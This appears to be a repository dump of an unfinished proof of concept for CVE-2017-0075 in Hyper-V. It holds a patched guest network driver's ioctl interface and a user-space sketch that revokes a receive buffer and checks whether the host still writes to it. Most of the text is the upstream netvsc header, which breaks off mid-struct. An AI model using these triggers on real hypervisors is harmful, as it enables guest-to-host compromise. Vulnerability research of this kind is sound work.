├── Demo.mp4
├── README.md
├── ring0
│   └── hyperv
│       ├── Kconfig
│       ├── Makefile
│       ├── hv_netvsc.ko
│       ├── hv_netvsc.mod.c
│       ├── hyper_v.h
│       ├── hyperv_net.h
│       ├── modules.order
│       ├── netvsc.c
│       ├── netvsc_drv.c
│       └── rndis_filter.c
├── ring3
│   ├── hyper_v
│   ├── hyper_v.c
│   ├── hyper_v.h
│   ├── hyper_v2
│   └── hyper_v2.c
└── run.sh

/Demo.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/4B5F5F4B/HyperV/b1fba46337217abc9280dbd374e3b4e7ee6ce17b/Demo.mp4
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # HyperV
2 | Almost one year ago, I wrote a PoC for CVE-2017-0075 after reading Jordan Rabet's Black Hat talk, but I had no time to turn it into a working exploit :(
3 | 
4 | 
5 | 
6 | 
--------------------------------------------------------------------------------
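The ring3 sources are listed in the tree above but not reproduced in this dump. Judging from the ioctl interface in `ring0/hyperv/hyper_v.h` below, the user-space side would drive the patched module roughly like the sketch that follows. The device path, the open flags, and the exact call order are assumptions, not taken from the actual PoC; only the `HYPERV_IOCTL_*` commands and `RECEIVE_BUFFER_INFO` come from the repo, and the ring3 copy of `hyper_v.h` is assumed to provide userspace-compatible `u32`/`bool` typedefs:

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include "hyper_v.h"   /* ring3 copy of the HYPERV_IOCTL_* definitions */

int main(void)
{
	/* "/dev/hyper_v" is a guess at the node the patched module exposes */
	int fd = open("/dev/hyper_v", O_RDWR);
	if (fd < 0) {
		perror("open");
		return 1;
	}

	RECEIVE_BUFFER_INFO info = { 0 };

	/* Establish a GPADL for a fresh guest receive buffer... */
	if (ioctl(fd, HYPERV_IOCTL_INIT_RECV_BUF_ESTABLISH_GPADL, &info) < 0)
		perror("establish gpadl");

	/* ...revoke and free it while the host may still reference it... */
	if (ioctl(fd, HYPERV_IOCTL_DESTROY_RECV_BUF, &info) < 0)
		perror("destroy recv buf");

	/* ...then ask the module whether the host wrote into the freed pages */
	if (ioctl(fd, HYPERV_IOCTL_CHECK_RECEIVE_BUFFER_TAINTED, &info) == 0 &&
	    info.receive_buffer_tainted)
		puts("host touched the revoked receive buffer");

	return 0;
}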
/ring0/hyperv/Kconfig:
--------------------------------------------------------------------------------
1 | config HYPERV_NET
2 | 	tristate "Microsoft Hyper-V virtual network driver"
3 | 	depends on HYPERV
4 | 	help
5 | 	  Select this option to enable the Hyper-V virtual network driver.
6 | 
--------------------------------------------------------------------------------
/ring0/hyperv/Makefile:
--------------------------------------------------------------------------------
1 | obj-$(CONFIG_HYPERV_NET) += hv_netvsc.o
2 | 
3 | hv_netvsc-y := netvsc_drv.o netvsc.o rndis_filter.o
--------------------------------------------------------------------------------
/ring0/hyperv/hv_netvsc.ko:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/4B5F5F4B/HyperV/b1fba46337217abc9280dbd374e3b4e7ee6ce17b/ring0/hyperv/hv_netvsc.ko
--------------------------------------------------------------------------------
/ring0/hyperv/hv_netvsc.mod.c:
--------------------------------------------------------------------------------
1 | #include <linux/module.h>
2 | #include <linux/vermagic.h>
3 | #include <linux/compiler.h>
4 | 
5 | MODULE_INFO(vermagic, VERMAGIC_STRING);
6 | MODULE_INFO(name, KBUILD_MODNAME);
7 | 
8 | __visible struct module __this_module
9 | __attribute__((section(".gnu.linkonce.this_module"))) = {
10 | 	.name = KBUILD_MODNAME,
11 | 	.init = init_module,
12 | #ifdef CONFIG_MODULE_UNLOAD
13 | 	.exit = cleanup_module,
14 | #endif
15 | 	.arch = MODULE_ARCH_INIT,
16 | };
17 | 
18 | static const char __module_depends[]
19 | __used
20 | __attribute__((section(".modinfo"))) =
21 | "depends=hv_vmbus";
22 | 
23 | MODULE_ALIAS("vmbus:635161f83edfc546913ff2d2f965ed0e");
24 | 
25 | MODULE_INFO(srcversion, "A6B5629D4E861F0508144F1");
--------------------------------------------------------------------------------
/ring0/hyperv/hyper_v.h:
--------------------------------------------------------------------------------
1 | #include <linux/ioctl.h>	/* needed for the _IO/_IOR/_IOWR macros */
2 | 
3 | 
4 | typedef struct _RECEIVE_BUFFER_INFO
5 | {
6 | 	u32 receive_buffer_size;
7 | 	u32 receive_buffer_gpadl_handle;
8 | 	void* receive_buffer;
9 | 	bool receive_buffer_tainted;
10 | }
11 | RECEIVE_BUFFER_INFO;
12 | 
13 | #define HYPERV_IOCTL_MAGCI 0x4B
14 | #define HYPERV_IOCTL_INIT_RECV_BUF_SEND_BUFFER _IOR(HYPERV_IOCTL_MAGCI, 1, u32)
15 | #define HYPERV_IOCTL_INIT_RECV_BUF_ESTABLISH_GPADL _IOWR(HYPERV_IOCTL_MAGCI, 6, RECEIVE_BUFFER_INFO)
16 | #define HYPERV_IOCTL_DESTROY_RECV_BUF _IOR(HYPERV_IOCTL_MAGCI, 7, RECEIVE_BUFFER_INFO)
17 | #define HYPERV_IOCTL_CHECK_RECEIVE_BUFFER_TAINTED _IOWR(HYPERV_IOCTL_MAGCI, 8, RECEIVE_BUFFER_INFO)
18 | #define HYPERV_IOCTL_SEND_RNDIS_PKT_KEEPALIVE _IOR(HYPERV_IOCTL_MAGCI, 2, bool)
19 | 
20 | #define HYPERV_IOCTL_SEND_RNDIS_PKT_QUERY _IO(HYPERV_IOCTL_MAGCI, 3)
21 | #define HYPERV_IOCTL_SEND_RNDIS_PKT_COMPLETE _IO(HYPERV_IOCTL_MAGCI, 5)
22 | #define HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD _IOR(HYPERV_IOCTL_MAGCI, 4, bool)
--------------------------------------------------------------------------------
/ring0/hyperv/hyperv_net.h:
--------------------------------------------------------------------------------
1 | /*
2 |  *
3 |  * Copyright (c) 2011, Microsoft Corporation.
4 |  *
5 |  * This program is free software; you can redistribute it and/or modify it
6 |  * under the terms and conditions of the GNU General Public License,
7 |  * version 2, as published by the Free Software Foundation.
8 |  *
9 |  * This program is distributed in the hope it will be useful, but WITHOUT
10 |  * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
11 |  * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
12 |  * more details.
13 |  *
14 |  * You should have received a copy of the GNU General Public License along with
15 |  * this program; if not, see <http://www.gnu.org/licenses/>.
16 |  *
17 |  * Authors:
18 |  *   Haiyang Zhang <haiyangz@microsoft.com>
19 |  *   Hank Janssen  <hjanssen@microsoft.com>
20 |  *   K. Y. Srinivasan <kys@microsoft.com>
21 |  *
22 |  */
23 | 
24 | #ifndef _HYPERV_NET_H
25 | #define _HYPERV_NET_H
26 | 
27 | #include <linux/list.h>
28 | #include <linux/hyperv.h>
29 | #include <linux/rndis.h>
30 | 
31 | /* RSS related */
32 | #define OID_GEN_RECEIVE_SCALE_CAPABILITIES 0x00010203 /* query only */
33 | #define OID_GEN_RECEIVE_SCALE_PARAMETERS 0x00010204 /* query and set */
34 | 
35 | #define NDIS_OBJECT_TYPE_RSS_CAPABILITIES 0x88
36 | #define NDIS_OBJECT_TYPE_RSS_PARAMETERS 0x89
37 | #define NDIS_OBJECT_TYPE_OFFLOAD 0xa7
38 | 
39 | #define NDIS_RECEIVE_SCALE_CAPABILITIES_REVISION_2 2
40 | #define NDIS_RECEIVE_SCALE_PARAMETERS_REVISION_2 2
41 | 
42 | struct ndis_obj_header {
43 | 	u8 type;
44 | 	u8 rev;
45 | 	u16 size;
46 | } __packed;
47 | 
48 | /* ndis_recv_scale_cap/cap_flag */
49 | #define NDIS_RSS_CAPS_MESSAGE_SIGNALED_INTERRUPTS 0x01000000
50 | #define NDIS_RSS_CAPS_CLASSIFICATION_AT_ISR 0x02000000
51 | #define NDIS_RSS_CAPS_CLASSIFICATION_AT_DPC 0x04000000
52 | #define NDIS_RSS_CAPS_USING_MSI_X 0x08000000
53 | #define NDIS_RSS_CAPS_RSS_AVAILABLE_ON_PORTS 0x10000000
54 | #define NDIS_RSS_CAPS_SUPPORTS_MSI_X 0x20000000
55 | #define NDIS_RSS_CAPS_HASH_TYPE_TCP_IPV4 0x00000100
56 | #define NDIS_RSS_CAPS_HASH_TYPE_TCP_IPV6 0x00000200
57 | #define NDIS_RSS_CAPS_HASH_TYPE_TCP_IPV6_EX 0x00000400
58 | 
59 | struct ndis_recv_scale_cap { /* NDIS_RECEIVE_SCALE_CAPABILITIES */
60 | 	struct ndis_obj_header hdr;
61 | 	u32 cap_flag;
62 | 	u32 num_int_msg;
63 | 	u32 num_recv_que;
64 | 	u16 num_indirect_tabent;
65 | } __packed;
66 | 
67 | 
68 | /* ndis_recv_scale_param flags */
69 | #define NDIS_RSS_PARAM_FLAG_BASE_CPU_UNCHANGED 0x0001
70 | #define NDIS_RSS_PARAM_FLAG_HASH_INFO_UNCHANGED 0x0002
71 | #define NDIS_RSS_PARAM_FLAG_ITABLE_UNCHANGED 0x0004
72 | #define NDIS_RSS_PARAM_FLAG_HASH_KEY_UNCHANGED 0x0008
73 | #define NDIS_RSS_PARAM_FLAG_DISABLE_RSS 0x0010
74 | 
75 | /* Hash info bits */
76 | #define NDIS_HASH_FUNC_TOEPLITZ 0x00000001
77 | #define NDIS_HASH_IPV4 0x00000100
78 | #define NDIS_HASH_TCP_IPV4 0x00000200
79 | #define NDIS_HASH_IPV6 0x00000400
80 | #define NDIS_HASH_IPV6_EX 0x00000800
81 | #define NDIS_HASH_TCP_IPV6 0x00001000
82 | #define NDIS_HASH_TCP_IPV6_EX 0x00002000
83 | 
84 | #define NDIS_RSS_INDIRECTION_TABLE_MAX_SIZE_REVISION_2 (128 * 4)
85 | #define NDIS_RSS_HASH_SECRET_KEY_MAX_SIZE_REVISION_2 40
86 | 
87 | #define ITAB_NUM 128
88 | 
89 | 
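/*
 * Illustration (not in the upstream header): the structure below is the
 * fixed head of a variable-length message. The indirection table and the
 * hash key are appended behind it and located via byte offsets measured
 * from the start of the struct. rndis_filter_set_rss_param() in
 * rndis_filter.c lays the message out roughly like this:
 *
 *	rssp->indirect_tabsize   = 4 * ITAB_NUM;
 *	rssp->indirect_taboffset = sizeof(struct ndis_recv_scale_param);
 *	rssp->hashkey_size       = NETVSC_HASH_KEYLEN;
 *	rssp->kashkey_offset     = rssp->indirect_taboffset +
 *				   rssp->indirect_tabsize;
 *	itab = (u32 *)((u8 *)rssp + rssp->indirect_taboffset);
 *	keyp = (u8 *)rssp + rssp->kashkey_offset;
 *
 * ("kashkey_offset" really is spelled that way in the driver.)
 */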
struct ndis_recv_scale_param { /* NDIS_RECEIVE_SCALE_PARAMETERS */ 90 | struct ndis_obj_header hdr; 91 | 92 | /* Qualifies the rest of the information */ 93 | u16 flag; 94 | 95 | /* The base CPU number to do receive processing. not used */ 96 | u16 base_cpu_number; 97 | 98 | /* This describes the hash function and type being enabled */ 99 | u32 hashinfo; 100 | 101 | /* The size of indirection table array */ 102 | u16 indirect_tabsize; 103 | 104 | /* The offset of the indirection table from the beginning of this 105 | * structure 106 | */ 107 | u32 indirect_taboffset; 108 | 109 | /* The size of the hash secret key */ 110 | u16 hashkey_size; 111 | 112 | /* The offset of the secret key from the beginning of this structure */ 113 | u32 kashkey_offset; 114 | 115 | u32 processor_masks_offset; 116 | u32 num_processor_masks; 117 | u32 processor_masks_entry_size; 118 | }; 119 | 120 | /* Fwd declaration */ 121 | struct ndis_tcp_ip_checksum_info; 122 | struct ndis_pkt_8021q_info; 123 | 124 | /* 125 | * Represent netvsc packet which contains 1 RNDIS and 1 ethernet frame 126 | * within the RNDIS 127 | * 128 | * The size of this structure is less than 48 bytes and we can now 129 | * place this structure in the skb->cb field. 130 | */ 131 | struct hv_netvsc_packet { 132 | /* Bookkeeping stuff */ 133 | u8 cp_partial; /* partial copy into send buffer */ 134 | 135 | u8 rmsg_size; /* RNDIS header and PPI size */ 136 | u8 rmsg_pgcnt; /* page count of RNDIS header and PPI */ 137 | u8 page_buf_cnt; 138 | 139 | u16 q_idx; 140 | u16 total_packets; 141 | 142 | u32 total_bytes; 143 | u32 send_buf_index; 144 | u32 total_data_buflen; 145 | }; 146 | 147 | struct netvsc_device_info { 148 | unsigned char mac_adr[ETH_ALEN]; 149 | int ring_size; 150 | u32 num_chn; 151 | u32 send_sections; 152 | u32 recv_sections; 153 | u32 send_section_size; 154 | u32 recv_section_size; 155 | }; 156 | 157 | enum rndis_device_state { 158 | RNDIS_DEV_UNINITIALIZED = 0, 159 | RNDIS_DEV_INITIALIZING, 160 | RNDIS_DEV_INITIALIZED, 161 | RNDIS_DEV_DATAINITIALIZED, 162 | }; 163 | 164 | #define NETVSC_HASH_KEYLEN 40 165 | 166 | struct rndis_device { 167 | struct net_device *ndev; 168 | 169 | enum rndis_device_state state; 170 | 171 | atomic_t new_req_id; 172 | 173 | spinlock_t request_lock; 174 | struct list_head req_list; 175 | 176 | struct work_struct mcast_work; 177 | 178 | bool link_state; /* 0 - link up, 1 - link down */ 179 | 180 | u8 hw_mac_adr[ETH_ALEN]; 181 | u8 rss_key[NETVSC_HASH_KEYLEN]; 182 | u16 ind_table[ITAB_NUM]; 183 | }; 184 | 185 | 186 | /* Interface */ 187 | struct rndis_message; 188 | struct netvsc_device; 189 | struct net_device_context; 190 | 191 | struct netvsc_device *netvsc_device_add(struct hv_device *device, 192 | const struct netvsc_device_info *info); 193 | int netvsc_alloc_recv_comp_ring(struct netvsc_device *net_device, u32 q_idx); 194 | void netvsc_device_remove(struct hv_device *device); 195 | int netvsc_send(struct net_device_context *ndc, 196 | struct hv_netvsc_packet *packet, 197 | struct rndis_message *rndis_msg, 198 | struct hv_page_buffer *page_buffer, 199 | struct sk_buff *skb); 200 | void netvsc_linkstatus_callback(struct hv_device *device_obj, 201 | struct rndis_message *resp); 202 | int netvsc_recv_callback(struct net_device *net, 203 | struct vmbus_channel *channel, 204 | void *data, u32 len, 205 | const struct ndis_tcp_ip_checksum_info *csum_info, 206 | const struct ndis_pkt_8021q_info *vlan); 207 | void netvsc_channel_cb(void *context); 208 | int netvsc_poll(struct napi_struct *napi, int budget); 209 
| 210 | void rndis_set_subchannel(struct work_struct *w); 211 | bool rndis_filter_opened(const struct netvsc_device *nvdev); 212 | int rndis_filter_open(struct netvsc_device *nvdev); 213 | int rndis_filter_close(struct netvsc_device *nvdev); 214 | struct netvsc_device *rndis_filter_device_add(struct hv_device *dev, 215 | struct netvsc_device_info *info); 216 | void rndis_filter_update(struct netvsc_device *nvdev); 217 | void rndis_filter_device_remove(struct hv_device *dev, 218 | struct netvsc_device *nvdev); 219 | int rndis_filter_set_rss_param(struct rndis_device *rdev, 220 | const u8 *key); 221 | int rndis_filter_receive(struct net_device *ndev, 222 | struct netvsc_device *net_dev, 223 | struct hv_device *dev, 224 | struct vmbus_channel *channel, 225 | void *data, u32 buflen); 226 | 227 | int rndis_filter_set_device_mac(struct netvsc_device *ndev, 228 | const char *mac); 229 | 230 | struct rndis_request *get_rndis_request(struct rndis_device *dev, 231 | u32 msg_type, 232 | u32 msg_len); 233 | 234 | int rndis_filter_send_request(struct rndis_device *dev, 235 | struct rndis_request *req); 236 | 237 | int rndis_filter_query_device_mac(struct rndis_device *dev, 238 | struct netvsc_device *net_device); 239 | 240 | void netvsc_switch_datapath(struct net_device *nv_dev, bool vf); 241 | 242 | #define NVSP_INVALID_PROTOCOL_VERSION ((u32)0xFFFFFFFF) 243 | 244 | #define NVSP_PROTOCOL_VERSION_1 2 245 | #define NVSP_PROTOCOL_VERSION_2 0x30002 246 | #define NVSP_PROTOCOL_VERSION_4 0x40000 247 | #define NVSP_PROTOCOL_VERSION_5 0x50000 248 | 249 | enum { 250 | NVSP_MSG_TYPE_NONE = 0, 251 | 252 | /* Init Messages */ 253 | NVSP_MSG_TYPE_INIT = 1, 254 | NVSP_MSG_TYPE_INIT_COMPLETE = 2, 255 | 256 | NVSP_VERSION_MSG_START = 100, 257 | 258 | /* Version 1 Messages */ 259 | NVSP_MSG1_TYPE_SEND_NDIS_VER = NVSP_VERSION_MSG_START, 260 | 261 | NVSP_MSG1_TYPE_SEND_RECV_BUF, 262 | NVSP_MSG1_TYPE_SEND_RECV_BUF_COMPLETE, 263 | NVSP_MSG1_TYPE_REVOKE_RECV_BUF, 264 | 265 | NVSP_MSG1_TYPE_SEND_SEND_BUF, 266 | NVSP_MSG1_TYPE_SEND_SEND_BUF_COMPLETE, 267 | NVSP_MSG1_TYPE_REVOKE_SEND_BUF, 268 | 269 | NVSP_MSG1_TYPE_SEND_RNDIS_PKT, 270 | NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE, 271 | 272 | /* Version 2 messages */ 273 | NVSP_MSG2_TYPE_SEND_CHIMNEY_DELEGATED_BUF, 274 | NVSP_MSG2_TYPE_SEND_CHIMNEY_DELEGATED_BUF_COMP, 275 | NVSP_MSG2_TYPE_REVOKE_CHIMNEY_DELEGATED_BUF, 276 | 277 | NVSP_MSG2_TYPE_RESUME_CHIMNEY_RX_INDICATION, 278 | 279 | NVSP_MSG2_TYPE_TERMINATE_CHIMNEY, 280 | NVSP_MSG2_TYPE_TERMINATE_CHIMNEY_COMP, 281 | 282 | NVSP_MSG2_TYPE_INDICATE_CHIMNEY_EVENT, 283 | 284 | NVSP_MSG2_TYPE_SEND_CHIMNEY_PKT, 285 | NVSP_MSG2_TYPE_SEND_CHIMNEY_PKT_COMP, 286 | 287 | NVSP_MSG2_TYPE_POST_CHIMNEY_RECV_REQ, 288 | NVSP_MSG2_TYPE_POST_CHIMNEY_RECV_REQ_COMP, 289 | 290 | NVSP_MSG2_TYPE_ALLOC_RXBUF, 291 | NVSP_MSG2_TYPE_ALLOC_RXBUF_COMP, 292 | 293 | NVSP_MSG2_TYPE_FREE_RXBUF, 294 | 295 | NVSP_MSG2_TYPE_SEND_VMQ_RNDIS_PKT, 296 | NVSP_MSG2_TYPE_SEND_VMQ_RNDIS_PKT_COMP, 297 | 298 | NVSP_MSG2_TYPE_SEND_NDIS_CONFIG, 299 | 300 | NVSP_MSG2_TYPE_ALLOC_CHIMNEY_HANDLE, 301 | NVSP_MSG2_TYPE_ALLOC_CHIMNEY_HANDLE_COMP, 302 | 303 | NVSP_MSG2_MAX = NVSP_MSG2_TYPE_ALLOC_CHIMNEY_HANDLE_COMP, 304 | 305 | /* Version 4 messages */ 306 | NVSP_MSG4_TYPE_SEND_VF_ASSOCIATION, 307 | NVSP_MSG4_TYPE_SWITCH_DATA_PATH, 308 | NVSP_MSG4_TYPE_UPLINK_CONNECT_STATE_DEPRECATED, 309 | 310 | NVSP_MSG4_MAX = NVSP_MSG4_TYPE_UPLINK_CONNECT_STATE_DEPRECATED, 311 | 312 | /* Version 5 messages */ 313 | NVSP_MSG5_TYPE_OID_QUERY_EX, 314 | NVSP_MSG5_TYPE_OID_QUERY_EX_COMP, 315 | 
NVSP_MSG5_TYPE_SUBCHANNEL, 316 | NVSP_MSG5_TYPE_SEND_INDIRECTION_TABLE, 317 | 318 | NVSP_MSG5_MAX = NVSP_MSG5_TYPE_SEND_INDIRECTION_TABLE, 319 | }; 320 | 321 | enum { 322 | NVSP_STAT_NONE = 0, 323 | NVSP_STAT_SUCCESS, 324 | NVSP_STAT_FAIL, 325 | NVSP_STAT_PROTOCOL_TOO_NEW, 326 | NVSP_STAT_PROTOCOL_TOO_OLD, 327 | NVSP_STAT_INVALID_RNDIS_PKT, 328 | NVSP_STAT_BUSY, 329 | NVSP_STAT_PROTOCOL_UNSUPPORTED, 330 | NVSP_STAT_MAX, 331 | }; 332 | 333 | struct nvsp_message_header { 334 | u32 msg_type; 335 | }; 336 | 337 | /* Init Messages */ 338 | 339 | /* 340 | * This message is used by the VSC to initialize the channel after the channels 341 | * has been opened. This message should never include anything other then 342 | * versioning (i.e. this message will be the same for ever). 343 | */ 344 | struct nvsp_message_init { 345 | u32 min_protocol_ver; 346 | u32 max_protocol_ver; 347 | } __packed; 348 | 349 | /* 350 | * This message is used by the VSP to complete the initialization of the 351 | * channel. This message should never include anything other then versioning 352 | * (i.e. this message will be the same for ever). 353 | */ 354 | struct nvsp_message_init_complete { 355 | u32 negotiated_protocol_ver; 356 | u32 max_mdl_chain_len; 357 | u32 status; 358 | } __packed; 359 | 360 | union nvsp_message_init_uber { 361 | struct nvsp_message_init init; 362 | struct nvsp_message_init_complete init_complete; 363 | } __packed; 364 | 365 | /* Version 1 Messages */ 366 | 367 | /* 368 | * This message is used by the VSC to send the NDIS version to the VSP. The VSP 369 | * can use this information when handling OIDs sent by the VSC. 370 | */ 371 | struct nvsp_1_message_send_ndis_version { 372 | u32 ndis_major_ver; 373 | u32 ndis_minor_ver; 374 | } __packed; 375 | 376 | /* 377 | * This message is used by the VSC to send a receive buffer to the VSP. The VSP 378 | * can then use the receive buffer to send data to the VSC. 379 | */ 380 | struct nvsp_1_message_send_receive_buffer { 381 | u32 gpadl_handle; 382 | u16 id; 383 | } __packed; 384 | 385 | struct nvsp_1_receive_buffer_section { 386 | u32 offset; 387 | u32 sub_alloc_size; 388 | u32 num_sub_allocs; 389 | u32 end_offset; 390 | } __packed; 391 | 392 | /* 393 | * This message is used by the VSP to acknowledge a receive buffer send by the 394 | * VSC. This message must be sent by the VSP before the VSP uses the receive 395 | * buffer. 396 | */ 397 | struct nvsp_1_message_send_receive_buffer_complete { 398 | u32 status; 399 | u32 num_sections; 400 | 401 | /* 402 | * The receive buffer is split into two parts, a large suballocation 403 | * section and a small suballocation section. These sections are then 404 | * suballocated by a certain size. 405 | */ 406 | 407 | /* 408 | * For example, the following break up of the receive buffer has 6 409 | * large suballocations and 10 small suballocations. 410 | */ 411 | 412 | /* 413 | * | Large Section | | Small Section | 414 | * ------------------------------------------------------------ 415 | * | | | | | | | | | | | | | | | | | | 416 | * | | 417 | * LargeOffset SmallOffset 418 | */ 419 | 420 | struct nvsp_1_receive_buffer_section sections[1]; 421 | } __packed; 422 | 423 | /* 424 | * This message is sent by the VSC to revoke the receive buffer. After the VSP 425 | * completes this transaction, the vsp should never use the receive buffer 426 | * again. 427 | */ 428 | struct nvsp_1_message_revoke_receive_buffer { 429 | u16 id; 430 | }; 431 | 432 | /* 433 | * This message is used by the VSC to send a send buffer to the VSP. 
The VSC 434 | * can then use the send buffer to send data to the VSP. 435 | */ 436 | struct nvsp_1_message_send_send_buffer { 437 | u32 gpadl_handle; 438 | u16 id; 439 | } __packed; 440 | 441 | /* 442 | * This message is used by the VSP to acknowledge a send buffer sent by the 443 | * VSC. This message must be sent by the VSP before the VSP uses the sent 444 | * buffer. 445 | */ 446 | struct nvsp_1_message_send_send_buffer_complete { 447 | u32 status; 448 | 449 | /* 450 | * The VSC gets to choose the size of the send buffer and the VSP gets 451 | * to choose the sections size of the buffer. This was done to enable 452 | * dynamic reconfigurations when the cost of GPA-direct buffers 453 | * decreases. 454 | */ 455 | u32 section_size; 456 | } __packed; 457 | 458 | /* 459 | * This message is sent by the VSC to revoke the send buffer. After the VSP 460 | * completes this transaction, the vsp should never use the send buffer again. 461 | */ 462 | struct nvsp_1_message_revoke_send_buffer { 463 | u16 id; 464 | }; 465 | 466 | /* 467 | * This message is used by both the VSP and the VSC to send a RNDIS message to 468 | * the opposite channel endpoint. 469 | */ 470 | struct nvsp_1_message_send_rndis_packet { 471 | /* 472 | * This field is specified by RNDIS. They assume there's two different 473 | * channels of communication. However, the Network VSP only has one. 474 | * Therefore, the channel travels with the RNDIS packet. 475 | */ 476 | u32 channel_type; 477 | 478 | /* 479 | * This field is used to send part or all of the data through a send 480 | * buffer. This values specifies an index into the send buffer. If the 481 | * index is 0xFFFFFFFF, then the send buffer is not being used and all 482 | * of the data was sent through other VMBus mechanisms. 483 | */ 484 | u32 send_buf_section_index; 485 | u32 send_buf_section_size; 486 | } __packed; 487 | 488 | /* 489 | * This message is used by both the VSP and the VSC to complete a RNDIS message 490 | * to the opposite channel endpoint. At this point, the initiator of this 491 | * message cannot use any resources associated with the original RNDIS packet. 
492 | */ 493 | struct nvsp_1_message_send_rndis_packet_complete { 494 | u32 status; 495 | }; 496 | 497 | union nvsp_1_message_uber { 498 | struct nvsp_1_message_send_ndis_version send_ndis_ver; 499 | 500 | struct nvsp_1_message_send_receive_buffer send_recv_buf; 501 | struct nvsp_1_message_send_receive_buffer_complete 502 | send_recv_buf_complete; 503 | struct nvsp_1_message_revoke_receive_buffer revoke_recv_buf; 504 | 505 | struct nvsp_1_message_send_send_buffer send_send_buf; 506 | struct nvsp_1_message_send_send_buffer_complete send_send_buf_complete; 507 | struct nvsp_1_message_revoke_send_buffer revoke_send_buf; 508 | 509 | struct nvsp_1_message_send_rndis_packet send_rndis_pkt; 510 | struct nvsp_1_message_send_rndis_packet_complete 511 | send_rndis_pkt_complete; 512 | } __packed; 513 | 514 | 515 | /* 516 | * Network VSP protocol version 2 messages: 517 | */ 518 | struct nvsp_2_vsc_capability { 519 | union { 520 | u64 data; 521 | struct { 522 | u64 vmq:1; 523 | u64 chimney:1; 524 | u64 sriov:1; 525 | u64 ieee8021q:1; 526 | u64 correlation_id:1; 527 | u64 teaming:1; 528 | }; 529 | }; 530 | } __packed; 531 | 532 | struct nvsp_2_send_ndis_config { 533 | u32 mtu; 534 | u32 reserved; 535 | struct nvsp_2_vsc_capability capability; 536 | } __packed; 537 | 538 | /* Allocate receive buffer */ 539 | struct nvsp_2_alloc_rxbuf { 540 | /* Allocation ID to match the allocation request and response */ 541 | u32 alloc_id; 542 | 543 | /* Length of the VM shared memory receive buffer that needs to 544 | * be allocated 545 | */ 546 | u32 len; 547 | } __packed; 548 | 549 | /* Allocate receive buffer complete */ 550 | struct nvsp_2_alloc_rxbuf_comp { 551 | /* The NDIS_STATUS code for buffer allocation */ 552 | u32 status; 553 | 554 | u32 alloc_id; 555 | 556 | /* GPADL handle for the allocated receive buffer */ 557 | u32 gpadl_handle; 558 | 559 | /* Receive buffer ID */ 560 | u64 recv_buf_id; 561 | } __packed; 562 | 563 | struct nvsp_2_free_rxbuf { 564 | u64 recv_buf_id; 565 | } __packed; 566 | 567 | union nvsp_2_message_uber { 568 | struct nvsp_2_send_ndis_config send_ndis_config; 569 | struct nvsp_2_alloc_rxbuf alloc_rxbuf; 570 | struct nvsp_2_alloc_rxbuf_comp alloc_rxbuf_comp; 571 | struct nvsp_2_free_rxbuf free_rxbuf; 572 | } __packed; 573 | 574 | struct nvsp_4_send_vf_association { 575 | /* 1: allocated, serial number is valid. 0: not allocated */ 576 | u32 allocated; 577 | 578 | /* Serial number of the VF to team with */ 579 | u32 serial; 580 | } __packed; 581 | 582 | enum nvsp_vm_datapath { 583 | NVSP_DATAPATH_SYNTHETIC = 0, 584 | NVSP_DATAPATH_VF, 585 | NVSP_DATAPATH_MAX 586 | }; 587 | 588 | struct nvsp_4_sw_datapath { 589 | u32 active_datapath; /* active data path in VM */ 590 | } __packed; 591 | 592 | union nvsp_4_message_uber { 593 | struct nvsp_4_send_vf_association vf_assoc; 594 | struct nvsp_4_sw_datapath active_dp; 595 | } __packed; 596 | 597 | enum nvsp_subchannel_operation { 598 | NVSP_SUBCHANNEL_NONE = 0, 599 | NVSP_SUBCHANNEL_ALLOCATE, 600 | NVSP_SUBCHANNEL_MAX 601 | }; 602 | 603 | struct nvsp_5_subchannel_request { 604 | u32 op; 605 | u32 num_subchannels; 606 | } __packed; 607 | 608 | struct nvsp_5_subchannel_complete { 609 | u32 status; 610 | u32 num_subchannels; /* Actual number of subchannels allocated */ 611 | } __packed; 612 | 613 | struct nvsp_5_send_indirect_table { 614 | /* The number of entries in the send indirection table */ 615 | u32 count; 616 | 617 | /* The offset of the send indirection table from top of this struct. 
618 | * The send indirection table tells which channel to put the send 619 | * traffic on. Each entry is a channel number. 620 | */ 621 | u32 offset; 622 | } __packed; 623 | 624 | union nvsp_5_message_uber { 625 | struct nvsp_5_subchannel_request subchn_req; 626 | struct nvsp_5_subchannel_complete subchn_comp; 627 | struct nvsp_5_send_indirect_table send_table; 628 | } __packed; 629 | 630 | union nvsp_all_messages { 631 | union nvsp_message_init_uber init_msg; 632 | union nvsp_1_message_uber v1_msg; 633 | union nvsp_2_message_uber v2_msg; 634 | union nvsp_4_message_uber v4_msg; 635 | union nvsp_5_message_uber v5_msg; 636 | } __packed; 637 | 638 | /* ALL Messages */ 639 | struct nvsp_message { 640 | struct nvsp_message_header hdr; 641 | union nvsp_all_messages msg; 642 | } __packed; 643 | 644 | 645 | #define NETVSC_MTU 65535 646 | #define NETVSC_MTU_MIN ETH_MIN_MTU 647 | 648 | #define NETVSC_RECEIVE_BUFFER_SIZE (1024*1024*16) /* 16MB */ 649 | #define NETVSC_RECEIVE_BUFFER_SIZE_LEGACY (1024*1024*15) /* 15MB */ 650 | #define NETVSC_SEND_BUFFER_SIZE (1024 * 1024 * 15) /* 15MB */ 651 | #define NETVSC_INVALID_INDEX -1 652 | 653 | #define NETVSC_SEND_SECTION_SIZE 6144 654 | #define NETVSC_RECV_SECTION_SIZE 1728 655 | 656 | #define NETVSC_RECEIVE_BUFFER_ID 0xcafe 657 | #define NETVSC_SEND_BUFFER_ID 0 658 | 659 | #define VRSS_SEND_TAB_SIZE 16 /* must be power of 2 */ 660 | #define VRSS_CHANNEL_MAX 64 661 | #define VRSS_CHANNEL_DEFAULT 8 662 | 663 | #define RNDIS_MAX_PKT_DEFAULT 8 664 | #define RNDIS_PKT_ALIGN_DEFAULT 8 665 | 666 | struct multi_send_data { 667 | struct sk_buff *skb; /* skb containing the pkt */ 668 | struct hv_netvsc_packet *pkt; /* netvsc pkt pending */ 669 | u32 count; /* counter of batched packets */ 670 | }; 671 | 672 | struct recv_comp_data { 673 | u64 tid; /* transaction id */ 674 | u32 status; 675 | }; 676 | 677 | struct multi_recv_comp { 678 | struct recv_comp_data 